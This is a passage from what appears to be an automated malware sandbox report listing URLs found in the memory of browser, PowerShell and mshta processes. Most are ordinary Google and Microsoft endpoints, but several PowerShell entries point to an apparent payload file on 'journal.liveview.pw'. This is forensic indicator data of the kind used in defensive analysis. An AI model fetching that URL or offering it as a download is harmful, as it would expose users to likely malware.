Source: chrome.exe, 00000009.00000003.57253214712.00007818006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57249143284.0000781C03C04000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2J
Source: chrome.exe, 00000009.00000003.57201001667.0000781800514000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/https://google-ohttp-relay-join.fastly-edge.com/
Source: chrome.exe, 00000009.00000002.57284172765.0000781800698000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/https://google-ohttp-relay-query.fastly-edge.com/htt
Source: chrome.exe, 00000009.00000003.57254846218.0000781C03C98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57249143284.0000781C03C74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57254563289.0000781C03C88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57201001667.0000781800514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57256935513.0000781C03D08000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57257089224.0000781C03D0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57255097467.0000781C03CA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57257291129.0000781C03D20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57284172765.0000781800698000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57256235739.0000781C03CD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57254276889.0000781C03C74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57256763123.0000781C03CF0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57255759131.0000781C03CC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57255456919.0000781C03CA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57256016342.0000781C03CC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57256467964.0000781C03CE0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/
Source: chrome.exe, 00000009.00000003.57253214712.00007818006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57249143284.0000781C03C04000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
Source: chrome.exe, 00000009.00000003.57201001667.0000781800514000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/htt
Source: chrome.exe, 00000009.00000002.57296562895.0000781C0341C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://googleads.g.doubleclick.net
Source: chrome.exe, 00000009.00000002.57298932167.0000781C03670000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296155580.0000781C03390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296562895.0000781C0341C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57285823302.0000781C022F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://googleads.g.doubleclick.net/
Source: chrome.exe, 00000009.00000002.57298932167.0000781C03670000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296155580.0000781C03390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296562895.0000781C0341C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2584082051607049&output=html&adk=181227
Source: chrome.exe, 00000009.00000002.57298932167.0000781C03670000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296155580.0000781C03390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296562895.0000781C0341C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2584082051607049&output=html&h=280&slot
Source: chrome.exe, 00000009.00000002.57296562895.0000781C0341C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2584082051607049&output=html&h=90&slotn
Source: chrome.exe, 00000009.00000002.57298932167.0000781C03670000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296155580.0000781C03390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296562895.0000781C0341C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://googleads.g.doubleclick.net/pagead/drt/s?v=r20120211
Source: chrome.exe, 00000009.00000002.57298932167.0000781C03670000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296155580.0000781C03390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296562895.0000781C0341C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://googleads.g.doubleclick.net/pagead/drt/si
Source: chrome.exe, 00000009.00000002.57298932167.0000781C03670000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296155580.0000781C03390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296562895.0000781C0341C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://googleads.g.doubleclick.net/pagead/html/r20210916/r20110914/zrt_lookup.html?fsb=1#RS-0-&adk=
Source: chrome.exe, 00000009.00000002.57298932167.0000781C03670000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296155580.0000781C03390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296562895.0000781C0341C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://googleads.g.doubleclick.net/pagead/html/r20210916/r20190131/zrt_lookup.html
Source: chrome.exe, 00000009.00000002.57298932167.0000781C03670000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296155580.0000781C03390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296562895.0000781C0341C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://googleads.g.doubleclick.net/xbbe/pixel?d=CICfxAEQ7KXQkAIY7dHaqQEwAQ&v=APEucNV8Higyb1mdtfCkDQ
Source: chrome.exe, 00000009.00000003.57201784624.00007818005B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57201709626.00007818005AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57201933144.00007818005CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://goto.google.com/sme-bugs
Source: chrome.exe, 00000009.00000003.57253214712.00007818006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57249143284.0000781C03C04000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://goto.google.com/sme-bugs27
Source: chrome.exe, 00000009.00000003.57249143284.0000781C03C04000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://goto.google.com/sme-bugs2e
Source: chrome.exe, 00000009.00000003.57201784624.00007818005B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57201709626.00007818005AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57201933144.00007818005CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://goto.google.com/sme-bugsp_
Source: chrome.exe, 00000009.00000003.57220737464.0000781C02CA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57223806168.0000781C032B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57295376441.0000781C032B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/220069903
Source: chrome.exe, 00000009.00000003.57220737464.0000781C02CA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57223806168.0000781C032B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57295376441.0000781C032B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/292285899
Source: chrome.exe, 00000009.00000003.57220737464.0000781C02CA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57223806168.0000781C032B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57295376441.0000781C032B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/349489248
Source: chrome.exe, 00000009.00000002.57295715512.0000781C0331A000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57285582693.0000781C022B2000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57294836975.0000781C031DC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://javadl.oracle.com/webapps/download/AutoDL?BundleId=245029_d3c52aa6bfa54d3ca74e617f18309292
Source: powershell.exe, 00000006.00000002.57163217722.0000000004BD8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://journal.liveview.pw
Source: powershell.exe, 00000006.00000002.57162749245.0000000004590000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://journal.liveview.pw/singl6.vsdx
Source: powershell.exe, 00000006.00000002.57163217722.0000000004BD8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://journal.liveview.pw/singl6.vsdx4
Source: chrome.exe, 00000009.00000002.57300353725.0000781C03920000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57228652650.0000781C03914000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57293381088.0000781C02F98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57292599013.0000781C02E48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTE
Source: chrome.exe, 00000009.00000003.57229611994.0000781C039C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57229782396.0000781C02804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57229474334.0000781C02744000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/gen204
Source: chrome.exe, 00000009.00000003.57229611994.0000781C039C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57229782396.0000781C02804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57229474334.0000781C02744000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/upload
Source: chrome.exe, 00000009.00000003.57229611994.0000781C039C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57229782396.0000781C02804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57229474334.0000781C02744000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/uploadbyurl
Source: chrome.exe, 00000009.00000003.57229611994.0000781C039C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57229782396.0000781C02804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57229474334.0000781C02744000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/v3/upload
Source: chrome.exe, 00000009.00000002.57284172765.0000781800698000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lensfrontend-pa.googleapis.com/v1/crupload
Source: chrome.exe, 00000009.00000003.57253214712.00007818006CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lensfrontend-pa.googleapis.com/v1/crupload2
Source: chrome.exe, 00000009.00000002.57289152036.0000781C02990000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57287094746.0000781C02524000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57294047139.0000781C0309C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57295715512.0000781C0331A000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57286804233.0000781C02448000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57287897439.0000781C02670000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57286034469.0000781C0232C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57301650160.0000781C03B0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57297912927.0000781C03554000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57286859172.0000781C02454000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.live.com
Source: chrome.exe, 00000009.00000002.57296232095.0000781C033AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57294047139.0000781C0309C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296155580.0000781C03390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57287897439.0000781C02670000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57286034469.0000781C0232C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57301650160.0000781C03B0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57297912927.0000781C03554000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/
Source: chrome.exe, 00000009.00000002.57295715512.0000781C0331A000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296679149.0000781C03438000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57294836975.0000781C031DC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/0
Source: chrome.exe, 00000009.00000002.57295715512.0000781C0331A000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296679149.0000781C03438000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57294836975.0000781C031DC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/0BJP
Source: chrome.exe, 00000009.00000002.57296978805.0000781C0347C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&checkda=1&ct=1632306401&rver=7.0.6738.0&wp=M
Source: chrome.exe, 00000009.00000002.57296924837.0000781C03470000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57286859172.0000781C02454000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=77f68844-337b-4044-a0d4-153795cf9153&scope=op
Source: chrome.exe, 00000009.00000002.57296924837.0000781C03470000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57286859172.0000781C02454000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/ppsecure/post.srf?client_id=77f68844-337b-4044-a0d4-153795cf9153&scope=openid
Source: mshta.exe, 00000002.00000002.56249468249.0000000003198000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.56231710859.0000000003196000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.comt
Source: chrome.exe, 00000009.00000002.57296924837.0000781C03470000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.microsoftonline.com/consumers/oauth2/v2.0/authorize?client_id=77f68844-337b-4044-a0d4-
Source: chrome.exe, 00000009.00000002.57296924837.0000781C03470000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.windows.net/consumers/oauth2/v2.0/authorize?client_id=77f68844-337b-4044-a0d4-153795cf
Source: chrome.exe, 00000009.00000002.57286920782.0000781C02470000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://m.google.com/devicemanagement/data/api
Source: chrome.exe, 00000009.00000002.57296352145.0000781C033D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57298227177.0000781C035C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/
Source: chrome.exe, 00000009.00000002.57296155580.0000781C03390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57298227177.0000781C035C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57289715694.0000781C02A5B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?usp=installed_webapp
Source: chrome.exe, 00000009.00000002.57296352145.0000781C033D4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/ebapp
Source: chrome.exe, 00000009.00000002.57301333788.0000781C03AA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57297973142.0000781C03568000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57289715694.0000781C02A5B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default
Source: chrome.exe, 00000009.00000002.57301333788.0000781C03AA0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_defaultdefault
Source: chrome.exe, 00000009.00000002.57293381088.0000781C02F98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57299963117.0000781C037F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57292045866.0000781C02D48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/?utm_source=ga-chrome-actions&utm_medium=manageGA
Source: chrome.exe, 00000009.00000002.57291222045.0000781C02C34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57285582693.0000781C022B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacy
Source: chrome.exe, 00000009.00000002.57293738861.0000781C03020000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57291222045.0000781C02C34000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhone
Source: chrome.exe, 00000009.00000003.57201784624.00007818005B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57201709626.00007818005AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57201933144.00007818005CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/shielded-email
Source: chrome.exe, 00000009.00000003.57253214712.00007818006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57249143284.0000781C03C04000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/shielded-email2B
Source: chrome.exe, 00000009.00000003.57201784624.00007818005B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57201709626.00007818005AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57201933144.00007818005CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/shielded-emailp_
Source: chrome.exe, 00000009.00000002.57295950754.0000781C03350000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57291222045.0000781C02C34000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/signinoptions/password?utm_source=ga-chrome-actions&utm_medium=changePW
Source: chrome.exe, 00000009.00000002.57293080729.0000781C02F08000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myactivity.google.com/
Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myshop.amplify.com/cart
Source: powershell.exe, 00000003.00000002.56221594211.000000000583E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.57163217722.0000000005AEF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: chrome.exe, 00000009.00000002.57286920782.0000781C02470000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oauthaccountmanager.googleapis.com/v1/issuetoken
Source: mshta.exe, 00000002.00000003.56246777435.00000000031DD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.56249723145.00000000031DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.56232080477.00000000031DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.56231710859.00000000031D0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.56215345271.0000000000650000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.57160001365.0000000000880000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.57431193652.0000000000629000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: chrome.exe, 00000009.00000002.57296978805.0000781C0347C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296155580.0000781C03390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57287173425.0000781C02544000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://office.com/setup
Source: chrome.exe, 00000009.00000002.57287788903.0000781C02664000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57287460063.0000781C02591000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57300950290.0000781C03A04000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ogs.google.com
Source: chrome.exe, 00000009.00000002.57296808325.0000781C03458000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296750141.0000781C0344C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1673999601&target=OPTIMIZATION_TARGET_PAG
Source: chrome.exe, 00000009.00000002.57296679149.0000781C03438000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296750141.0000781C0344C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57294836975.0000781C031DC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1679317318&target=OPTIMIZATION_TARGET_LAN
Source: chrome.exe, 00000009.00000002.57296864037.0000781C03464000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296750141.0000781C0344C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1689043206&target=OPTIMIZATION_TARGET_VIS
Source: chrome.exe, 00000009.00000002.57296808325.0000781C03458000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296864037.0000781C03464000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296750141.0000781C0344C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1691042511&target=OPTIMIZATION_TARGET_NEW
Source: chrome.exe, 00000009.00000002.57296808325.0000781C03458000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296750141.0000781C0344C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1696267841&target=OPTIMIZATION_TARGET_OMN
Source: chrome.exe, 00000009.00000002.57296864037.0000781C03464000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296924837.0000781C03470000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296750141.0000781C0344C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1715213284&target=OPTIMIZATION_TARGET_TEX
Source: chrome.exe, 00000009.00000002.57296808325.0000781C03458000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296864037.0000781C03464000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296750141.0000781C0344C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1722870342&target=OPTIMIZATION_TARGET_CLI
Source: chrome.exe, 00000009.00000002.57296808325.0000781C03458000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57294769307.0000781C031CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296750141.0000781C0344C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1722870385&target=OPTIMIZATION_TARGET_GEO
Source: chrome.exe, 00000009.00000002.57294769307.0000781C031CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296679149.0000781C03438000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296750141.0000781C0344C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57294836975.0000781C031DC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1722870420&target=OPTIMIZATION_TARGET_NOT
Source: chrome.exe, 00000009.00000002.57296978805.0000781C0347C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57299708684.0000781C03764000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1724079789&target=OPTIMIZATION_TARGET_CLI
Source: chrome.exe, 00000009.00000002.57296978805.0000781C0347C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57299708684.0000781C03764000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1724079821&target=OPTIMIZATION_TARGET_GEO
Source: chrome.exe, 00000009.00000002.57296978805.0000781C0347C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57299708684.0000781C03764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296924837.0000781C03470000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1724079854&target=OPTIMIZATION_TARGET_NOT
Source: chrome.exe, 00000009.00000002.57296864037.0000781C03464000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296750141.0000781C0344C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=2311071436&target=OPTIMIZATION_TARGET_WEB
Source: chrome.exe, 00000009.00000002.57296864037.0000781C03464000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296924837.0000781C03470000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296750141.0000781C0344C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57294836975.0000781C031DC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=240731042095&target=OPTIMIZATION_TARGET_S
Source: chrome.exe, 00000009.00000002.57296808325.0000781C03458000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296750141.0000781C0344C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=5&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
Source: chrome.exe, 00000009.00000002.57286920782.0000781C02470000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/v1:GetHints
Source: chrome.exe, 00000009.00000002.57295715512.0000781C0331A000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57295825106.0000781C03324000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://packetstormsecurity.com/
Source: chrome.exe, 00000009.00000002.57288553025.0000781C0286C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57230873141.0000781C02864000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57228123695.0000781C02868000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57231062927.0000781C02868000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://packetstormsecurity.com/files/22459/BIOS320.EXE.html
Source: chrome.exe, 00000009.00000002.57295715512.0000781C0331A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://packetstormsecurity.com/files/22459/BIOS320.EXE.html0
Source: chrome.exe, 00000009.00000002.57295715512.0000781C0331A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://packetstormsecurity.com/files/22459/BIOS320.EXE.html0BJ
Source: chrome.exe, 00000009.00000002.57288553025.0000781C0286C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57230873141.0000781C02864000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57228123695.0000781C02868000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57231062927.0000781C02868000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://packetstormsecurity.com/files/22459/BIOS320.EXE.htmlndler7
